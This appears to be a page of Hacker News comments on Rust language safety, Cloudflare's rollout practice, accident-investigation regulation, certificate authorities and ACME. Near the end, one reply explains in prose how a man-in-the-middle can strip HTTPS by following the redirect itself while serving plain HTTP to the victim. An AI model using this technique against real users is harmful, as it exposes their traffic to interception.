In languages like Java their version of the Billion Dollar mistake doesn't have arbitrary Undefined Behaviour but it is going to blow up your program, so you're also going to need to track that or pay everywhere to keep checking your work - and since Rust doesn't have the mistake you don't need to do that.
Likewise C# apparently doesn't have arbitrary Undefined Behaviour for data races. But it does lose Sequential Consistency, so, humans can't successfully reason about non-trivial software when that happens, whereas safe Rust doesn't have data races so no problem.
Neither of these languages can model the no-defaults case, which is trivial in Rust and, ironically, plausible though not trivial in C++. So if you have no-defaults anywhere in your problem, Rust is fine with that, languages like Go and Java can't help you, "just imagine a default into existence and code around the problem" sounds like cognitive load to me.
This seems like a very strange position, code written for Rust in 2015 still works, and in 2015 Rust just doesn't have const generics†, or async, or I/O safety, so... how is that not a subset of the language at it stands today ?
† As you're apparently a C++ programmer you would call these "Non-type template parameters"
C++ as First Language seems like an especially terrible idea to me. Maybe I should take a few months and go do one of those courses and see whether it's as bad as I expect.
The nice thing about Rust as First Language (which I'm not sure I'd endorse, but it can't be as bad as C++) is that because safe Rust ropes off so many footguns it's extremely unlikely that you'll be seriously injured by your lack of understanding as a beginner. You may not be able to do something because you didn't yet understand how - or you might do something in a terribly sub-optimal way, but you're not likely to accidentally write nonsense without realising and have that seem to work.
For example yesterday there was that piece where the author seems to have misunderstood how heap allocation works in Rust. But, in safe Rust that's actually harmless. If they write their mistake it won't compile, maybe they figure out why, maybe they give up and can't use heap allocation until they learn more.
I haven't thought too hard about Zig as first language, because to me the instability rules that out. Lecturers hate teaching moving targets.
As somebody that "learned" C++ (Borland C++... the aggressively blue memories...) first at a very young age, I heartily agree.
Rust just feels natural now. Possibly because I was exposed to this harsh universe of problems early. Most of the stupid traps that I fell into are clearly marked and easy to avoid.
It's just so easy to write C++ that seems like it works until it doesn't...
There's probably a "Pay it forwards" lesson from Rust's diagnostics too.
So much end user software tries to be "friendly" by just saying "An error occurred" regardless of what's wrong or whether you can do anything about it. Rust does better and it's a reminder that you can too.
Yeah, I immediately twitched when I saw the PartialEq implementation. Somebody is going to write code which finds the "correct" order and ends up allowing someone to order the same pizza but get yours, while you have to wait for it to be made and cooked again.
It's not difficult to write the predicate same_details_as() and then it's obvious to reviewers if that's what we meant and discourages weird ad-hoc code which might stop working when the PizzaDetails is redefined.
Apparently somehow this had never been how Cloudflare did this. I expressed incredulity about this to one of their employees, but yeah, seems like their attitude was "We never make mistakes so it's fastest to just deploy every change across the entire system immediately" and as we've seen repeatedly in the past short while that means it sometimes blows up.
They have blameless post mortems, but maybe "We actually do make mistakes so this practice is not good" wasn't a lesson anybody wanted to hear.
Blameless post mortems should be similar to air accident investigations. I.e. don't blame the people involved (unless they are acting maliciously), but identify and fix the issues to ensure this particular incident is unlikely to recur.
The intent of the postmortems is to learn what the issues are and prevent or mitigate similar issues happening in the future. If you don't make changes as a result of a postmortem then there's no point in conducting them.
The aviation industry regularly requires certifications, check rides, and re-qualifications when humans mess up. I have never seen anything like that in tech.
Sometimes the solution is to not let certain people do certain things which are risky.
Agree 100%, however using your example, there is no regulatory agency that investigate the issue and demand changes to avoid related future problems. Should the industry move towards this way?
However, one of the things you see (if you read enough of them) in accident investigation reports for regulated industries is a recurring pattern
1. Accident happens
2. Investigators conclude Accident would not happen if people did X. Recommend regulator requires that people do X, citing previous such recommendations each iteration
3. Regulator declined this recommendation, arguing it's too expensive to do X, or people already do X, or even (hilariously) both
4. Go to 1.
Too often, what happens is that eventually
5. Extremely Famous Accident Happens, e.g. killing loved celebrity Space Cowboy
6. Investigators conclude Accident would not happen if people did X, remind regulator that they have previously recommended requiring X
7. Press finally reads dozens of previous reports and so News Story says: Regulator killed Space Cowboy!
8. Regulator decides actually they always meant to require X after all
As bad as (3) sounds, I'll strongman the argument: it's important to keep the economic cost of any regulation in mind.*
On the one hand, you'd like to prevent the thing the regulation is seeking to prevent.
On the other hand, you'd have costs for the regulation to be implemented (one-time and/or ongoing).
"Is the good worth the costs?" is a question worth asking every time. (Not least because sometimes it lets you downscope/target regulations to get better good ROI)
*Yes, the easy pessimistic take is 'industry fights all regulation on cost grounds', but the fact that the argument is abused doesn't mean it doesn't have some underlying merit
I think conventionally the verb is "to steelman" with the intended contrast being to a strawman, an intentionally weak argument by analogy to how straw isn't strong but steel is. I understood what you meant by "strongman" but I think that "steelman" is better here.
There is indeed a good reason regulators aren't just obliged to institute all recommendations - that would be a lot of new rules. The only accident report I remember reading with zero recommendations was a MAIB (Maritime accidents) report here which concluded that a crew member of a fishing boat has died at sea after their vessel capsized because they both they and the skipper (who survived) were on heroin, the rationale for not recommending anything was that heroin is already illegal, operating a fishing boat while on heroin is already illegal, and it's also obviously a bad idea, so, there's nothing to recommend. "Don't do that".
Cost is rarely very persuasive to me, because it's very difficult to correctly estimate what it will actually cost to change something once you decided it's required - based on current reality where it is not. Mass production and clever cost reductions resulting from the normal commercial pressures tend to drive down costs when we require something but not before (and often not after we cease to require it either)
It's also difficult to anticipate all benefits from a good change without trying it. Lobbyists against a regulation will often try hard not to imagine benefits after all they're fighting not to be regulated. But once it's in action, it may be obvious to everyone that this was just a better idea and absurd it wasn't always the case.
Remember when you were allowed to smoke cigarettes on aeroplanes? That seems crazy, but at the time it was normal and I'm sure carriers insisted that not being allowed to do this would cost them money - and perhaps for a short while it did.
> it's very difficult to correctly estimate what it will actually cost to change something once you decided it's required - based on current reality where it is not. Mass production and clever cost reductions resulting from the normal commercial pressures tend to drive down costs
Difficult, but not impossible.
What are calculable and do NOT scale down is cost for compliance documentation and processes. Changing from 1 form of documentation to 4 forms of documentation has measurable cost, that will be imposed forever.
> It's also difficult to anticipate all benefits from a good change without trying it.
That's not a great argument, because it can be counterbalanced by the equally true opposite: it's difficult to anticipate all downsides to a change without trying it.
> Remember when you were allowed to smoke cigarettes on aeroplanes?
Remember when you could walk up to a gate 5 minutes before a flight, buy a ticket, and fly?
The current TSA security theater has had some benefits, but it's also made using airports far worse as a traveler.
I mean, I'm pretty sure there was a long period where you could walk up 5 minutes before, and fly on a plane where you're not allowed to smoke. It's completely unrelated.
The TSA makes no sense as a safety intervention, it's theatre, it's supposed to look like we're trying hard to solve the problem, not be an attempt to solve the problem, and if there was an accident investigation for 9/11 I can't think why, that's not an accident.
As to your specific claim about enforcement, actually we don't even know whether we'd increase paperwork overhead in many cases. Rationalization driven by new regulation can actually reduce this instead.
For a non-regulatory (at least in the sense that there's no government regulators involved) example consider Let's Encrypt's ACME which was discussed here recently. ACME complies with the "Ten Blessed Methods". But prior to Let's Encrypt the most common processes weren't stricter, or more robust, they were much worse and much more labour intensive. Some of them were prohibited more or less immediately when the "Ten Blessed Methods" were required because they're just obviously unacceptable.
The Proof of Control records from ACME are much better than what had been the usual practice prior yet Let's Encrypt is $0 at point of use and even if we count the actual cost (borne by donations rather than subscribers) it's much cheaper than the prior commercial operators had been for much more value delivered.
> They have blameless post mortems, but maybe "We actually do make mistakes so this practice is not good" wasn't a lesson anybody wanted to hear.
Or they could say, "we want to continue to prioritise speed of security rollouts over stability, and despite our best efforts, we do make mistakes, so sometimes we expect things will blow up".
I guess it depends what you're optimising for... If the rollout speed of security patches is the priority then maybe increased downtime is a price worth paying (in their eyes anyway)... I don't agree with that, but at least it's an honest position to take.
That said, if this was to address the React CVE then it was hardly a speedy patch anyway... You'd think they could have afforded to stagger the rollout over a few hours at least.
It's just poor risk management at this point. Making sure that a configuration change doesn't crash the production service shouldn't take more than a few seconds in a well-engineered system even if you're not doing staged rollout.
> In both Go and Rust, allocating an object on the heap is as easy as returning a pointer to a struct from a function.
I can't figure out what the author is envisioning here for Rust.
Maybe, they actually think if they make a pointer to some local variable and then return the pointer, that's somehow allocating heap? It isn't, that local variable was on the stack and so when you return it's gone, invalidating your pointer - but Rust is OK with the existence of invalid pointers, after all safe Rust can't dereference any pointers, and unsafe Rust declares the programmer has taken care to ensure any pointers being dereferenced are valid (which this pointer to a long dead variable is not)
[If you run a new enough Rust I believe Clippy now warns that this is a bad idea, because it's not illegal to do this, but it's almost certainly not what you actually meant]
Or maybe in their mind, Box<Goose> is "a pointer to a struct" and so somehow a function call Box::new(some_goose) is "implicit" allocation, whereas the function they called in Zig to allocate memory for a Goose was explicit ?
Yeah, this is very confusing to me. I don't see how someone can conflate Go implicitly deciding whether to promote a pointer to the heap based on escape analysis without any way for the programmer to tell other than having to replicate the logic that's happening at runtime with needing to explicitly use one on the APIs that literally exist for the sole purpose of allocating on the heap without either fundamentally misunderstanding something or intentionally being misleading.
In fact knowing the private key for other people's certificate you issue is strictly forbidden for the publicly trusted CAs. That's what happened years back when a "reseller" company named Trustico literally sent the private keys for all their customers to the issuing CA apparently under the impression this would somehow result in refunding or re-issuing or something. The CA checked, went "These are real, WTF?" and revoked all the now useless certificates.
It is called a private key for a reason. Don't tell anybody. It's not a secret that you're supposed to share with somebody, it's private, tell nobody. Which in this case means - don't let your "reseller" choose the key, that's now their key, your key should be private which means you don't tell anybody what it is.
If you're thinking "But wait, if I don't tell anybody, how can that work?" then congratulations - this is tricky mathematics they didn't cover in school, it is called "Public key cryptography" and it was only invented in the 20th century. You don't need to understand how it works, but if you want to know, the easiest kind still used today is called the RSA Digital Signature so you can watch videos or read a tutorial about that.
If you're just wondering about Let's Encrypt, well, Let's Encrypt don't know or want to know anybody else's private keys either, the ACME software you use will, in entirely automated cases, pick random keys, not tell anybody, but store them for use by the server software and obtain suitable certificate for those keys, despite not telling anybody what the key is.
So, the crucial thing ACME has that the other protocols do not is a hole (and some example ways to fill that hole for your purpose, though others are documented in newer RFCs) for the Proof of Control.
See, SCEP assumes that Bob trusts Alice to make certificates. Alice uses the SCEP server provided by Bob, but she can make any certificate that Bob allows. If she wants to make a certificate claiming she's the US Department of Education, or Hacker News, or Tesco supermarkets, she can do that. For your private Intranet that's probably fine, Alice is head of Cyber Security, she issues certificate according to local rules, OK.
But for the public web we have rules about who we should issue certificates to, and these ultimately boil down to we want to issue certificates only to the people who actually control the name they're getting a certificate for. Historically this had once been extremely hard core (in the mid-1990s when SSL was new) but a race to the bottom ensued and it had become basically "Do you have working email for that domain?" and sometimes not even that.
So in parallel with Let's Encrypt, work happened to drag all the trusted certificate issuers to new rules called the "Ten Blessed Methods" which listed (initially ten) ways you could be sure that this subscriber is allowed a certificate for news.ycombinator.com and so if you want to do so you're allowed to issue that certificate.
Several ACME kinds of Proof of Control are actually directly reflected in the Ten Blessed Methods, and gradually the manual options have been deprecated and more stuff moves to ACME.
e.g. "3.2.2.4.19 Agreed‑Upon Change to Website ‑ ACME" is a specific method which is how your cheesiest "Let's Encrypt in a box" type software tends to work, where we prove we control www.some.example by literally just changing a page on www.some.example in a specific way when requested and that's part of the ACME specification so it can be done automatically without a human in the loop.
Redirection doesn't get the job done, without at least a mechanism so that browsers reliably stop visiting the HTTP site (HSTS) and ideally an HTTPS-everywhere feature which, in turn, was not deployable for ordinary people until almost every common site they visit is HTTPS enabled and works properly.
The problem is that there are active bad guys. Redirection means when there are no bad guys or only passive bad guys, the traffic is encrypted, but bad guys just ensure the redirect sends people to their site instead.
Users who go to http://mysite.example/ would be "redirected" to https://mysite.example/ but that redirection wasn't protected so instead the active bad guy ensures they're redirected to https://scam.example/mysite/ and look, it has the padlock symbol and it says mysite in the bar, what more do you want?
Snowden was definitely a coincidence in the sense that this wasn't a pull decision. Users didn't demand this as a result of Snowden. However, Snowden is why BCP #188 (RFC 7258) aka "Pervasive Monitoring is an Attack" happened, and certainly BCP #188 helped because it was shorthand for why the arguments against encryption everywhere were bogus. One or another advocate for some group who supposedly "need" to be able to snoop on you stands up, gives a twenty minute presentation about why although they think encryption is great, they do need to er, not have encryption, the response in one sentence is "BCP 188 says don't do this". Case closed, go away.
There are always people who insist they have a legitimate need to snoop. Right now in Europe they're pulling on people's "protect the children" heart strings, but we already know - also in Europe that the very moment they get a tiny crack for this narrative in march giant corporations who demand they must snoop to ensure they get their money, and government espionage need to snoop on everybody to ensure they don't get out of line.
> Users who go to http://mysite.example/ would be "redirected" to https://mysite.example/ but that redirection wasn't protected so instead the active bad guy ensures they're redirected to https://scam.example/mysite/ and look, it has the padlock symbol and it says mysite in the bar, what more do you want?
You can do better than this. You can have your mitm proxy follow the SSL redirect itself, but still present plain HTTP to the client. So the client still sees the true "mysite.example" domain in the URL bar (albeit on plain http), and the server has a good SSL session, but the attacker gets to see all of the traffic.
In languages like Java their version of the Billion Dollar mistake doesn't have arbitrary Undefined Behaviour but it is going to blow up your program, so you're also going to need to track that or pay everywhere to keep checking your work - and since Rust doesn't have the mistake you don't need to do that.
Likewise C# apparently doesn't have arbitrary Undefined Behaviour for data races. But it does lose Sequential Consistency, so, humans can't successfully reason about non-trivial software when that happens, whereas safe Rust doesn't have data races so no problem.
Neither of these languages can model the no-defaults case, which is trivial in Rust and, ironically, plausible though not trivial in C++. So if you have no-defaults anywhere in your problem, Rust is fine with that, languages like Go and Java can't help you, "just imagine a default into existence and code around the problem" sounds like cognitive load to me.
Edited: Fix editorial mistake
reply